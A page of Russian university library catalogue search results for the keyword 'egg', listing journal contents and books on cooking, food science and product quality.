Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

281 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Яйцо")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 43
21. 
Питание и общество. - Журнал, 2009г. № 2
Оглавление 
  • Мезенцева, Э. О сервисе в деталях / Э. Мезенцева. - с.4-5
    Кл. слова: СЕРВИС
  • Галкина, С. "Омское гостеприимство - 2008" / С. Галкина, О. В. Пасько, И. Крючкова. - с.8-9
    Кл. слова: ЧЕМПИОНАТ, КУЛИНАРИЯ
  • Троицкая, Е. Во - блин!.. На пороге - Масленница! / Е. Троицкая, М. Эрте. - с.12-14
    Кл. слова: БЛИНЫ, МАСЛЕНИЦА
  • Сизых, В. Фрукты в изделиях из теста / В. Сизых. - с.15-16
    Кл. слова: ФРУКТЫ - ПИТАНИЕ
  • Кучер, Л. Отмечаем день Святого Валентина / Л. Кучер, Л. Шкуратова. - с.18
    Кл. слова: ДЕНЬ СВЯТОГО ВАЛЕНТИНА
  • Забнев, С. Обжарка кофейного зерна / С. Забнев. - с.19
    Кл. слова: КОФЕ
  • Симонов, Г. Яйцо для полноценного питания / Г. Симонов. - с.26
    Кл. слова: ЯЙЦА
  • Свекла. - с.27
  • Филонов, М. Похвальное слово мясу / М. Филонов. - с.28-29
    Кл. слова: МЯСО
22. 
Родина. - Журнал, 2004г. № 4
Оглавление 
  • Ковальчук, Владимир. Олений праздник / В. Ковальчук
  • Матвеев, Владимир. "Русские покушались строить мечети..." / В. Матвеев. - с.8-12
  • Леонович, Владимир. "Далёко знать, Воушка! " / В. Леонович. - с.13-16
  • Льву Аннинскому - 70!. - с.16
  • Шацилло, Михаил. На деньги немецких кухарок / М. Шацилло. - с.17-21
  • Цветков, Василий. Белогвардейская альтернатива / В. Цветков. - с.22-25
  • Прохоров, Александр. Маятник русской души / А. Прохоров. - с.26-28
  • Аннинский, Лев. Курица и яйцо / Л. Аннинский. - с.29
  • Балабанов, Валерий. Реквием / В. Балабанов. - с.30-31
  • Макаров, Игорь. Лебедев, он же Ласточкин / И. Макаров. - с.41-43
  • Черкасов, Петр. Яблоко раздора / П. Черкасов. - с.44-45
  • Курукин, Игорь. "Нагло казну разворовывать..." / И. Курукин. - с.46-49
  • Петрухинцев, Николай. Время собирать караван / Н. Петрухинцев. - с.50-54
  • Конкурс "История России глазами современников". - с.32-33
  • Экштут, Семен. "В мундирах выпушки, погончики, петлички" / С. Экштут. - с.56-58
  • Морозов, Борис. Вертоград здравию / Б. Морозов. - с.36-40
  • Кудинов, Геннадий. Тайна "человека во фраке" / Г. Кудинов. - с.59-61
  • Климкова, Марина. Святой из Осиновых Гаев / М. Климкова. - с.62-64
  • Черкашин, Николай. Одиссея мичмана Домерщикова / Н. Черкашин. - с.65-66
  • Исаев, Виктор. И всюду страсти роковые... / В. Исаев. - с.67-69
  • Базаров, Александр. ГУЛАГ для Буренки / А. Базаров. - с.70-76
  • Молодяков, Василий. Рапалльский договор / В. Молодяков. - с.77-78
  • Молодяков, Василий. Нобелевские премии по литературе: "Доктор Живаго" (1958) и "Тихий Дон" (1965) / В. Молодяков. - с.79-80
  • Каратаскова, Рената. "Косматы, волосаты, блудницы..." / Р. Каратаскова. - с.82-84
  • Рославцева, Лидия. Препоясай меня силою / Л. Рославцева. - с.85-87
  • Миненко, Нина. Загулял, так ворота настежь / Н. Миненко. - с.89-94
  • Щербинин, Павел. Баба с газетой / П. Щербинин. - с.95-97
  • Кулакова, Ирина. Альбом "лохматого медвежонка" / И. Кулакова. - с.98-103
  • Кирсанова, Раиса. Второй Шаляпин в своем деле / Р. Кирсанова. - с.104-107
  • Новый адрес Москвы. - с.108-109
  • Сабурова, Татьяна. Композиции в русском стиле / Т. Сабурова. - с.110
  • [Рецензия]. - с.88
  • [Рецензия]. - с.88
  • [Рецензия]. - с.88
  • [Рецензия]. - с.88
  • [Рецензия]. - с.88
  • [Рецензия]. - с.88
  • [Рецензия]. - с.88
  • [Рецензия]. - с.88
  • [Рецензия]. - с.88
23. 
Высоцкая, Юлия. 365 рецептов на каждый день [Текст] / Ю. Высоцкая ; дар. Г. А. Кириленко, 2014. - 414 с.
Держатели документа (Информация об экземплярах) 
24. 
Наука, образование, бизнес [Текст] / Междунар. акад. наук высш. шк., Ин-т радиоэлектроники, сервиса и диагностики, Науч.-произв. центр "Динамика", Ом. произв. об-ние "Радиозавод им. А. С. Попова" (РЕЛЕРО), ОмГТУ, 2012. - 381 с.
Ключевые слова 
ОМПИ -- ОМГТУ -- ОМСК -- КОНФЕРЕНЦИЯ -- ИРСИД -- КВАЛИФИКАЦИЯ -- ПОВЫШЕНИЕ -- КАЧЕСТВО -- ВУЗ -- УНИВЕРСИТЕТ -- ИНСТИТУТ -- ПРЕДПРИЯТИЕ -- БЕЗОПАСНОСТЬ -- УЧЕБНЫЙ -- ПРОЦЕСС -- ОРГАНИЗАЦИЯ -- СТУДЕНТ -- ЛИЧНОСТЬ -- КОМПЕТЕНТНОСТНАЯ -- ХАРАКТЕРИСТИКА -- ЦЕННОСТНЫЙ -- КРИЗИС -- ПРОФЕССИОНАЛЬНОЕ -- ОБРАЗОВАНИЕ -- ТЕЛЕПАТИЯ -- ОБУЧЕНИЕ -- СТАНДАРТ -- ЖИЗНЕННАЯ -- СТРАТЕГИЯ -- РОССИЙСКАЯ -- МОЛОДЕЖЬ -- ТОВАР -- ПРОМЫШЛЕННЫЙ -- ПОТРЕБИТЕЛЬСКИЙ -- ПИЩЕВОЙ -- ПРОДУКТ -- КОНСЕРВАНТ -- ПРОДОВОЛЬСТВЕННАЯ -- СИБИРСКОЕ -- СЕЛЬСКОЕ -- ХОЗЯЙСТВО -- РАЗВИТИЕ -- БЕЛОК -- БОБОВАЯ -- КУЛЬТУРА -- МАТЕРИАЛ -- ДОРОЖНО-СТРОИТЕЛЬНЫЙ -- ДОРОЖНЫЙ -- СТРОИТЕЛЬНЫЙ -- КРАСИТЕЛЬ -- ДЕЯТЕЛЬНОСТЬ -- ЭФФЕКТИВНОСТЬ -- ИНВЕСТИЦИОННОЕ -- ПЛАНИРОВАНИЕ -- ЭЛЕКТРОЭНЕРГИЯ -- ОМСКЭНЕРГО -- ОМСКЭНЕРГО -- СТРОИТЕЛЬНОЕ -- РСУ 3+ -- УПРАВЛЕНИЕ -- ТЕЛЕКОММУНИКАЦИЯ -- ОБСЛУЖИВАНИЕ -- УСЛУГА -- РОСТЕЛЕКОМ -- ГИБРИДНАЯ -- КЛАСТЕРИЗАЦИЯ -- МЕТРОЛОГИЯ -- ПРОИЗВОДСТВО -- МОДЕРНИЗАЦИЯ -- СОЦИАЛЬНАЯ -- ЗАЩИТА -- ТРАНСНЕФТЬ -- СОТРУДНИК -- ПРОДУКЦИЯ -- ЦЕЛЬ -- ОБОРОТНЫЙ -- КАПИТАЛ -- ИНСТРУМЕНТАЛЬНОЕ -- ОБЕСПЕЧЕНИЕ -- РАДИОЗАВОД -- ПОЛИ-ПРО-ПАК -- СЛУЖБА -- МАРКЕТИНГ -- НАУЧНОЕ -- ИССЛЕДОВАНИЕ -- ДИАГНОСТИРОВАНИЕ -- НЕИСПРАВНОСТЬ -- БЛОК -- КОЛЕСНЫЙ -- МОТОРНЫЙ -- ЛЕТАТЕЛЬНЫЙ -- АППАРАТ -- РАДИОПРОЗРАЧНЫЙ -- ОБТЕКАТЕЛЬ -- РАДИОТЕХНИЧЕСКАЯ -- ВЕЩЕСТВО -- НЕЙРО-НЕЧЕТКИЙ -- ВЫВОД -- ФОТОПРИЕМНИК -- ПЗС-ФОТОПРИЕМНИК -- ВИБРОСИГНАЛ -- АНАЛИЗ -- ФРАКТАЛЬНЫЙ -- АВТОМОБИЛЬ -- ТОПЛИВО -- ВИДЕОКОНФЕРЕНЦСВЯЗЬ -- РАДИОТЕХНИЧЕСКОЕ -- УСТРОЙСТВО -- ПРОГНОЗИРОВАНИЕ -- УСИЛИТЕЛЬ -- ВЫСОКОЛИНЕЙНЫЙ -- ЧАСТОТНЫЙ -- КАНАЛ -- АВТОГЕНЕРАТОР -- ВОЛНА -- АКУСТИЧЕСКАЯ -- ФИЛЬТР -- СВЯЗЬ -- ОБРАТНАЯ -- ПЕТЛЯ -- КАРТЕЗИАНСКАЯ -- ЧАСТОТА -- СТАБИЛИЗАЦИЯ -- МАЛОШУМЯЩИЙ -- ИНФОРМАЦИОННАЯ -- ШУМОВАЯ -- ГЕНЕРАТОР -- СВЧ -- ВЫКЛЮЧАТЕЛЬ -- ИРТЫШ -- РЭУ -- САПР -- ЭЛЕКТРОДВИГАТЕЛЬ -- ТОК -- ПОТРЕБЛЕНИЕ -- ЭЛЕКТРОПОЕЗД -- ОЦЕНКА -- БАТАРЕЯ -- АККУМУЛЯТОРНАЯ -- ПАРАМЕТР -- АНТЕННАЯ -- РЕШЕТКА -- ДРЕВЕСИНА -- СУШКА -- МОЩНОСТЬ -- СВЕРХШИРОКОПОЛОСНЫЙ -- ПРОЗВОНКА -- ПЛАТА -- ИНДИКАЦИЯ -- АНТЕННЫЙ -- КОММУТАТОР -- ПЕРЕМЕЩЕНИЕ -- ДАТЧИК -- ЭЛЕКТРОННЫЙ -- БОЛЬНОЙ -- ОРГАН -- ПРОЕКЦИЯ -- ПОИСК -- БЕЗБОЛЕЗНЕННЫЙ -- СУ-ДЖОК -- КОЖНЫЙ -- ПОКРОВ -- РАДИОСТАНЦИЯ -- СПЕКТРАЛЬНАЯ -- ДЕФЕКТ -- СПОРТИВНЫЙ -- ШЕСТ -- МИКРОАКУСТИКА -- МИКРОАКУСТКА -- МУЛЬТИСЕРВИСНАЯ -- СЕТЬ -- ВХОДЯЩАЯ -- МИНЕРАЛЬНОЕ -- МАСЛО -- СИГНАЛ -- КОДЕР -- ЛИНЕЙНО-ЧАСТОТНЫЙ -- ЛИНЕЙНЫЙ -- ЧАСТОТНЫЙ -- МОДУЛИРОВАННЫЙ -- ИНФОРМАЦИЯ -- ЯЙЦО -- ЗАРОДЫШ -- ЖИЗНЕСПОСОБНОСТЬ -- ПТИЦА -- ИНКУБАЦИЯ -- ПТИЦЕФАБРИКА -- ЗДАНИЕ -- СООРУЖЕНИЕ -- ТЕПЛОВИЗИОННЫЙ -- РАДИОСИГНАЛ -- ОБНАРУЖЕНИЕ -- ШИРОКОПОЛОСНЫЙ -- УЛЬТРАЗВУКОВОЙ -- ЭЛЕКТРОД -- КОРПУС -- ЭЛЕКТРОННАЯ -- ТЕХНИКА -- НИЗКОТЕМПЕРАТУРНАЯ -- ОБЖИГАЕМАЯ -- КЕРАМИКА -- СЧЕТЧИК -- ГАЗОВЫЙ -- ФОТОКАМЕРА -- ПРОЗРАЧНОСТЬ -- ОТЛИВКА -- АККУМУЛЯТОР -- ТЕСТИРОВАНИЕ -- ЛИТИЙ-ИОННЫЙ -- ПЕРЕДАЧА -- РАДИОСТАНЦИЯ -- НИЗКОВОЛЬТНЫЙ -- ИСТОЧНИК -- ПИТАНИЕ -- ОПТИЧЕСКОЕ -- ВОЛОКНО -- МОДЕЛИРОВАНИЕ -- РАССЕЯНИЕ -- БРИЛЛЮЭНОВСКОЕ -- ВОЛОКОННО-ОПТИЧЕСКАЯ -- ВОЛОКОННАЯ -- ОПТИЧЕСКАЯ -- КВАРЦЕВЫЙ -- РЕЗОНАТОР -- ТЕРМОНАПРЯЖЕНИЕ -- ТЕЛЕФОНИЯ -- IP-ТЕЛЕФОНИЯ -- ЦИФРОВОЙ -- ВОЛЬТМЕТР -- ПРИЕМНИК -- ПОСТОЯННЫЙ -- ДВИГАТЕЛЬ -- ЗАМИРАНИЕ -- РАДИОРЕЛЕЙНАЯ -- СИСТЕМА -- ВЫСОКОЧАСТОТНЫЙ -- ОХРАННАЯ -- СИГНАЛИЗАЦИЯ -- ЦИФРОВОЕ -- ТЕЛЕВИЗИОННОЕ -- ВЕЩАНИЕ -- ПИРОМЕТР -- НЕЙРОННАЯ -- СПЕКТРОСКОПИЯ -- ИМПЕДАНСНАЯ -- КАТОДНЫЙ -- МАТЕРИАЛ -- ЛИТИЕВЫЙ -- УКВ -- ДИАПАЗОН -- РАДИОПЕРЕДАЮЩЕЕ -- АНАЛОГОВОЕ -- ПРОЕКТИРОВАНИЕ -- ИЗУЧЕНИЕ -- ТЕРМОСТАТ -- КОНТРОЛЛЕР -- ЛАКИРОВАНИЕ -- ВЛАГОЗАЩИТНОЕ -- ПОКРЫТИЕ -- ЦИФРОВАЯ -- ОБРАБОТКА -- ДИОД -- ТУННЕЛЬНЫЙ -- ТЕЛЕВИДЕНИЕ -- ХАФФМАНА КОД -- СПУТНИКОВАЯ -- КРИПТОГРАФИЧЕСКАЯ -- ЗАЩИТА -- СВАРНОЕ -- СОЕДИНЕНИЕ -- ЗАВОД МОДУЛЬНЫХ КОНСТРУКЦИЙ -- МИКРОПОЛОСКОВЫЙ -- ПЕРЕСТРАИВАЕМЫЙ -- ВЕРНОСТЬ -- ВОСПРОИЗВЕДЕНИЕ -- АППАРАТУРА -- ЖИДКОСТНОЕ -- ОХЛАЖДЕНИЕ -- ИЗОБРАЖЕНИЕ -- ВИДЕО -- СЖАТИЕ -- ПИРОМЕТР -- ИЗЛУЧЕНИЕ -- ЭЛЕКТРИЧЕСКИЙ -- АВТОМАТИЧЕСКАЯ -- РЕГУЛИРОВКА -- ЯРКОСТЬ -- РАДИОЛОКАЦИОННАЯ -- СТАНЦИЯ -- МАГНЕТРОН -- МУЛЬТИПЛЕКСИРОВАНИЕ -- ДЕФЕКТОСКОП -- УЛЬТРАЗВУКОВОЙ -- ЦИФРОВАЯ -- ФИЛЬТРАЦИЯ -- КИНОЗАЛ -- ЗВУК -- ТРАССОВЫЙ -- РАДИОЛОКАЦИОННЫЙ -- КОМПЛЕКС
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
25. 
Управление персоналом. - Журнал, 2004г. № 15
Оглавление 
  • Завьялова, Ж. Мы должны быть профессионалами и при этом оставаться самим собой / Ж. Завьялова. - с.8-13
  • Моисеев, А. Каждый тренинг - это что-то уникальное, как яйцо Фаберже / А. Моисеев. - с.14
  • Бессуднова, С. Посттренинг, или Жизнь после... / С. Бессуднова. - с.15
  • Рыжкина, В. Истина где-то там, или аутсорсинг развития персонала / В. Рыжкина, Ф. Коноров. - с.16-17
  • Симонова, Е. М. Тренинги для топ-персонала: житейская мифология / Е. М. Симонова. - с.18-19
  • Рудякова, Н. Жизнь в условиях тренинга. Взгляд изнутри / Н. Рудякова. - с.20-21
  • Соловьева, Е. "Вам чай или кофе? А вот и не угадали - чай..." / Е. Соловьева. - с.22
  • Виноградова, С. Мастер-класс для менеджера по обучению / С. Виноградова. - с.23-25
  • Шелекетова, И. 1000 мелочей хорошего семинара / И. Шелекетова. - с.26-28
  • Булавинов, Д. "Кто хочет всегда преуспевать, должен менять свое поведение соответственно времени" / Д. Булавинов, Ю. Ужакина, А. Кучвальский. - с.30-37
  • Чернецов, Г. П. Создание и продажа решений в процессе управления изменениями / Г. П. Чернецов. - с.38-42
  • Оськин, В. Каждый HR желает знать... / В. Оськин. - с.44-48
  • Александрова, Е. Кадровые агентства: нанимать или не нанимать? / Е. Александрова. - с.49-51
  • Дергунова, О. Анализ рынка кадровых услуг в г. Барнауле / О. Дергунова. - с.52-53
  • Анищенко, А. Г. Древнее учение фэншуй / А. Г. Анищенко. - с.54-55
  • Кнопов, Г. С. В частной школе учитель может и учить, и воспитывать каждого ребенка более успешно / Г. С. Кнопов. - с.56-58
  • Пашутин, С. Особенности правила Парето в условиях российского рынка / С. Пашутин. - с.59-62
  • Лапин, А. Н. Стратегическое управление современной организацией / А. Н. Лапин. - с.63-69
  • Макаренко, В. Врата ада / В. Макаренко. - с.70-72
  • Нашивочникова, В. Н. Создание системы управления персоналом - инвестиционный проект компании / В. Н. Нашивочникова. - с.70-72
  • Завьялова, Ж. Мы должны быть профессионалами и при этом оставаться самим собой / Ж. Завьялова. - с.8-13
  • Моисеев, А. Каждый тренинг - это что-то уникальное, как яйцо Фаберже / А. Моисеев. - с.14
  • Бессуднова, С. Посттренинг, или Жизнь после... / С. Бессуднова. - с.15
  • Рыжкина, В. Истина где-то там, или аутсорсинг развития персонала / В. Рыжкина, Ф. Коноров. - с.16-17
  • Симонова, Е. М. Тренинги для топ-персонала: житейская мифология / Е. М. Симонова. - с.18-19
  • Рудякова, Н. Жизнь в условиях тренинга. Взгляд изнутри / Н. Рудякова. - с.20-21
  • Соловьева, Е. "Вам чай или кофе? А вот и не угадали - чай..." / Е. Соловьева. - с.22
  • Виноградова, С. Мастер-класс для менеджера по обучению / С. Виноградова. - с.23-25
  • Шелекетова, И. 1000 мелочей хорошего семинара / И. Шелекетова. - с.26-28
  • Булавинов, Д. "Кто хочет всегда преуспевать, должен менять свое поведение соответственно времени" / Д. Булавинов, Ю. Ужакина, А. Кучвальский. - с.30-37
  • Чернецов, Г. П. Создание и продажа решений в процессе управления изменениями / Г. П. Чернецов. - с.38-42
  • Оськин, В. Каждый HR желает знать... / В. Оськин. - с.44-48
  • Александрова, Е. Кадровые агентства: нанимать или не нанимать? / Е. Александрова. - с.49-51
  • Дергунова, О. Анализ рынка кадровых услуг в г. Барнауле / О. Дергунова. - с.52-53
  • Анищенко, А. Г. Древнее учение фэншуй / А. Г. Анищенко. - с.54-55
  • Кнопов, Г. С. В частной школе учитель может и учить, и воспитывать каждого ребенка более успешно / Г. С. Кнопов. - с.56-58
  • Пашутин, С. Особенности правила Парето в условиях российского рынка / С. Пашутин. - с.59-62
  • Лапин, А. Н. Стратегическое управление современной организацией / А. Н. Лапин. - с.63-69
  • Макаренко, В. Врата ада / В. Макаренко. - с.70-72
26. 
Вокруг света. - Журнал, 2003г. № 5
Оглавление 
  • Решетов, Владимир. Сияние / В. Решетов. - с.10-16
  • В море мельницы стоят, свет для Дании творят.... - с.20
  • Бусыгин, Аркадий. В футбол играют настоящие машины / А. Бусыгин, N EWS. SPL/EAST. - с.26-31
  • Май. - с.38-44
  • Фатющенко, Андрей. Уйти нельзя. Обидите. / А. Фатющенко, А. Семашко. - с.46-62
  • Салон открытых дверей. - с.66-74
  • Широко открытые глаза. - с.76-85
  • Какова статистика землетрясений?. - с.86
  • Андреев, Николай. "Курица" или "яйцо"? / Н. Андреев. - с.88-98
  • Как угадать победителя в Эйнтри?. - с.100-102
  • Кто был первым русским солдатом?. - с.103
  • Зубов, Александр. Наследники по прямой / А. Зубов, С. Новиков, N EWS. SPL/EAST. - с.104-114
  • Почему деньги не пахнут?. - с.116
  • Где находится остров Сокровищ?. - с.116-117
  • Хачатуров, Сергей. Племянник Эрмитажа, Третьяковки старший брат / С. Хачатуров, А. Семашко, А. Голубовский. - с.118-128
  • Анисимов, Евгений. Рождение каменной симфонии / Е. Анисимов. - с.132-137
  • Лейбов, Михаил. Нерукотворное / М. Лейбов, М. Лейбов. - с.140-147
  • Воробьева, Мария. В ухо, в горло, в нос / М. Воробьева, М. Елизарова. - с.148-155
  • Цветная раскладушка. - с.156
  • Цифровой глаз. - с.158
  • Соловьева, Алла. Пока не поздно / А. Соловьева, С. Новиков. - с.160-163
  • Коршунов, Александр. Восток-Запад / А. Коршунов, Ю. Юров. - с.166-175
  • За что американцы не любят колючего поросенка?. - с.176
  • Грицюк, Виктор. Заонежская Эллада / В. Грицюк, В. Грицюк. - с.178-185
  • Всеволжский, Андрей. Неподдающаяся / А. Всеволжский. - с.186-193
  • Что нужнее воздуха?. - с.194
  • Постников, Алексей. Имперские игры / А. Постников, С. Новиков. - с.196-205
  • Хемингуэй, Эрнест. Охота и разговоры / Э. Хемингуэй, Н. Волжина, В. Хинкис. - с.208-211
  • "Эврика!". - с.216
27. 
Пищевая промышленность. - Журнал, 2004г. № 4
Оглавление 
  • Богомолов, И. П. Пищевая и мукомольно-крупяная промышленность / И. П. Богомолов, Б. П. Рукин. - с.6-9
    Кл. слова: Промышленность мукомольная
  • Панин, А. У. Отраслевое развитие малого бизнеса / А. У. Панин, Е. В. Гаврилова. - с.10-15
  • Степанова, В. С. Трансформация и развитие продуктов подкомплексов региона / В. С. Степанова. - с.16-19
  • Маламуд, Д. Б. Тенденции регионального производства яйцепродукции на предприятиях АПК / Д. Б. Маламуд, А. Н. Сидоров. - с.20-21
    Кл. слова: ЯЙЦЕПРОДУКТЫ
  • Сергеев, В. Н. Рыбная промышленность России - 13 лет свободного плавания / В. Н. Сергеев. - с.22-26
  • Маслова, Г. В. Инновационные технологии переработки объектов водного промысла / Г. В. Маслова. - с.18-29
  • Красночуб, А. В. Обеспечение микробиологической чистоты на пищевых производствах / А. В. Красночуб. - с.34-35
  • Новожилова, О. А. Чистота - визитная карточка предприятия пищевой промышленности / О. А. Новожилова. - с.38-39
  • Тимминс, М. Оборудование для взвешивания и упаковки: ваша работа становится намного чище и прибыльнее / М. Тимминс. - с.40-41
  • Щербатова, И. А. Управление запасами пищевого предприятия / И. А. Щербатова, Е. Б. Козин, Т. А. Козина. - с.44-45
    Кл. слова: УПРАВЛЕНИЕ ЗАПАСАМИ
  • Тужилкин, В. И. Дополнительное профессиональное образование возраждается / В. И. Тужилкин, В. С. Сергунов. - с.46-48
    Кл. слова: ОБРАЗОВАНИЕ НЕПРЕРЫВНОЕ, ОБРАЗОВАНИЕ ДОПОЛНИТЕЛЬНОЕ
  • Проселков, В. Г. Реформирование информационного обеспечения технического регулирования в России / В. Г. Проселков. - с.50-52
    Кл. слова: РЕГУЛИРОВАНИЕ ТЕХНИЧЕСКОЕ
  • Парагульгов, О. Д. Система оценки, подтверждения соответствия и контроля качества алкогольной продукции Национального союза участников алкогольного рынка / О. Д. Парагульгов, Н. И. Гусева, К. Г. Багдасарян. - с.56-59
    Кл. слова: АЛКОГОЛЬ - ТОРГОВЛЯ
  • Абрамова, Н. И. Автоматизированный комплекс приготовления "мюсли-батончик" / Н. И. Абрамова, Г. В. Клаповский. - с.60
  • Тихонова, Е. М. Простое яйцо - почти золото / Е. М. Тихонова. - с.62-63
  • Беспалов, В. В. Новые технологии витаминизации / В. В. Беспалов. - с.64
  • Матисон, В. А. Повышение стабильности пива путем совершенствования работы туннельных пастеризаторов / В. А. Матисон, А. Ю. Бурашников. - с.68-69
  • Смирнова, С. Потребление упаковки российскими предприятиями пищевой промышленности / С. Смирнова. - с.70
  • Смышляев, А. Как выйти в лидеры в области переработки полимеров. Современные тенденции развития оборудования для переработки полимеров / А. Смышляев. - с.72-74
  • Сочная упаковка: есть свет в конце картонного туннеля!. - с.76-78
  • Красный, Д. В. Аналитические приборы для контроля безопасности качества продукции / Д. В. Красный, Е. В. Мещерская. - с.80-81
  • Шленская, Т. В. Экспресс-анализ токсичности пищевых продуктов / Т. В. Шленская, В. Н. Голубев. - с.82
  • Ойола, Х. К. Ароматизаторы для мясной индустрии / Х. К. Ойола. - с.86-88
  • Бегларян, А. Р. Производство сметаны с использованием соевого жира / Бегларян А. Р., Р. А. Баклачян. - с.94
  • Родченков, Г. М. Хромато-масс-спектральный анализ пищевых добавок и смесей / Г. М. Родченков, Н. Ю. Тимошенкова. - с.96
  • Елхов, В. Н. Представляем Союз мороженщиков России / В. Н. Елхов. - с.100-101
  • Агропродовольственный рынок России. - с.108-110
    Кл. слова: Рынок продовольственный
Держатели документа (Информация об экземплярах) 
28. 
Современная торговля. - Журнал, 2006г. № 8
Оглавление 
  • Гаврилов, Б. Российские реалии франчайзинга / Б. Гаврилов. - с.42-46
    Кл. слова: ФРАНЧАЙЗИНГ - РОССИЯ
  • Выбор покупателя. Как одеть и обуть средний класс?. - с.75-78
  • Егорова, О. Требования к безопасности и качеству яиц / О. Егорова. - с.79-81
    Кл. слова: ЯЙЦО - КАЧЕСТВО
  • Кузнецов, Г. Стресс на службе: причины и следствие / Г. Кузнецов. - с.82-84
Держатели документа (Информация об экземплярах) 
29. 
Психология зрелости и старения. - Журнал, 2009г. № 4
Оглавление 
  • Борисенко, Ю. В. К вопросу о критериях личностной зрелости в период взрослости / Ю. В. Борисенко. - с.5-26
  • Крюков, Д. С. Социально-психологический подход к исследованию динамики Я-концепции верующего: теория и практика / Д. С. Крюков. - с.27-44
  • Ермолаева, М. В. К проблеме взаимодействия пожилых людей и детей / М. В. Ермолаева. - с.45-55
  • Шатохина, В. А. Опыт работы с нарративами в консультировании людей пожилого возраста в системе социального обслуживания / В. А. Шатохина. - с.56-67
  • Архипова, О. В. Технологическая модель организации досуговой активности пожилых людей в рамках концепции образования в позднем возрасте / О. В. Архипова. - с.68-84
  • Гаврилина, Л. К. Тренинг "Яйцо" / Л. К. Гаврилина. - с.85-93
  • Грабчук, К. М. Мотивация добровольческой деятельности студентов в социальной работе с пожилыми людьми / К. М. Грабчук. - с.94-101
  • Дерябина, О. М. Объединение усилий медиков и психологов как залог успеха лечебного и реабилитационного процесса / О. М. Дерябина. - с.102-117
  • Коновалова, А. М. Отчет о пресс-конференции Ирвина Ялома / А. М. Коновалова. - с.118-126
Держатели документа (Информация об экземплярах) 
30. 
Четверикова, Ольга Петровна. Сырье и ингредиенты хлебопекарного и кондитерского производства [Текст] / О. П. Четверикова, 2018. - 666 с.
Ключевые слова 
СПРАВОЧНИК -- ПШЕНИЧНАЯ -- МУКА -- РЖАНАЯ -- КРУПА -- ХЛОПЬЯ -- САХАР -- СИРОП -- ПАТОКА -- ГЛЮКОЗА -- ДЕКСТРОЗА -- ФРУКТОЗА -- ЛАКТОЗА -- МЕД -- ЖИР -- МАСЛО -- ВОДА -- ДРОЖЖИ -- ЗАКВАСКА -- МОЛОКО -- ТВОРОГ -- ИЗОЛЯТ -- ЯЙЦО -- КРАХМАЛ -- ПОДСЛАСТИТЕЛЬ -- САХАРОЗАМЕНИТЕЛЬ -- РАЗРЫХЛИТЕЛЬ -- УЛУЧШИТЕЛЬ -- ФЕРМЕНТ -- КЛЕЙКОВИНА -- БЕЛОК -- СОЛЬ -- ЭМУЛЬГАТОР -- АНТИОКСИДАНТ -- ГИДРОКОЛЛОИДЫ -- ПИЩЕВОЕ -- ВОЛОКНО -- КЛЕТЧАТКА -- ФРУКТЫ -- ЯГОДЫ -- СУХОФРУКТЫ -- ЦУКАТЫ -- ОРЕХ -- КУНЖУТ -- СОЛОД -- КАКАО -- КРАСИТЕЛЬ
Держатели документа (Информация об экземплярах) 
31. 
Кулинария [Текст] / П. В. Абатуров [и др.] ; дар. В. С. Михайленко, 1955. - 959, [1] с.
Держатели документа (Информация об экземплярах) 
32. 
Экспертиза продовольственных товаров: Лабораторный практикум [Текст] / сост. Ю. И. Сидоренко [и др.] ; ред. Ю. И. Сидоренко, 2013. - 180, [1] с.
Держатели документа (Информация об экземплярах) 

В лабораторном практикуме изложены методы экспертизы качества основных групп продовольственных товаров, сгруппированных согласно учебной товароведческой классификации.

Приведены примеры экспертизы основных видов продовольственных товаров в каждой товароведческой группе. Рассмотрены нормативная база, состоящая из основных нормативных документов, относящихся к данной товароведческой группе, основные термины и определения, касающиеся технологии и оборота товаров данной товароведческой группы. Приведены основные методы оценки по органолептическим и физико-химическим показателям товаров.

Лабораторный практикум предназначен для студентов, обучающихся по специальностям 260504.65 "Технология консервов и пищеконцентратов", 260505.65 "Технология детского и функционального питания" и 260503.65 "Технология субтропических и пищевкуковых продуктов".

33. 
Тимофеева, Валентина Афанасьевна. Товароведение продовольственных товаров [Текст] / В. А. Тимофеева, 2012. - 478 с.
Держатели документа (Информация об экземплярах) 

Предлагаемый учебник соответствует Государственному образовательному стандарту и тематическому плану дисциплины "Товароведение продовольственных товаров".

В книге рассматриваются основные вопросы товароведения продовольственных товаров в современных условиях; приведены необходимые продавцу и товароведу сведения по всем группам товаров, а также по вопросам стандартизации и сертификации, информационному обеспечению, которые позволят работникам торговли принимать квалифицированные решения в коммерческой деятельности.

Предназначен для студентов колледжей и техникумов. Также может быть рекомендован для вузов экономических специальностей.

34. 
Богушева, Валентина Ивановна. Технология приготовления пищи [Текст] / В. И. Богушева, 2010. - 374, [1] с.
Держатели документа (Информация об экземплярах) 

В пособии представлен весь комплекс теоретических основ производства продукции общественного питания.

Дана характеристика химического состава и физических свойств различных продуктов. Рассмотрены основные способы и приемы первичной обработки сырья и приготовления полуфабрикатов. Характеризуются приемы тепловой обработки, а также изменения, происходящие в продуктах под влиянием высоких температур.

Основная часть пособия посвящена технологии приготовления кулинарных блюд, правилам их оформления и подачи.

Особое внимание обращается на требования, предъявляемые к качеству продукции общественного питания, срокам ее хранения и реализации.

В последних главах освещаются вопросы лечебного и детского питания, дается характеристика различных диет.

Предназначено для студентов технологических, торгово-экономических, кооперативных колледжей и техникумов. Он может представлять интерес и для практических работников, обучающихся в системе переподготовки кадров и повышения квалификации.

35. 
Контроль качества сырья и готовой продукции на предприятиях общественного питания [Текст] / О. В. Бредихина [и др.], 2014. - 191 с.
Держатели документа (Информация об экземплярах) 

В настоящем учебном пособии изложены основные понятия о качестве продукции и организации контроля продукции на предприятиях общественного питания. Приведены методы контроля качества и безопасности сырья, полуфабрикатов и готовой продукции, используемых для сырья животного и растительного происхождения. Описаны основные требования к мясу и мясопродуктам, отличительные особенности и правила оценки качества и безопасности. Представлены сведения по мясу, птице и яйцам. Приведены требования к рыбному сырью и нерыбным объектам промысла, а также к готовой продукции из данного сырья. Описаны требования по качественным характеристикам мучных и кондитерских изделий, сырья, полуфабрикатов и готовых изделий. В приложении приводятся основные документы, регламентирующие показатели качества в общественном питании.

Предназначено для бакалавров обучающихся по направлению 260800 «Тех-нология продукции и организация общественного питания».

36. 
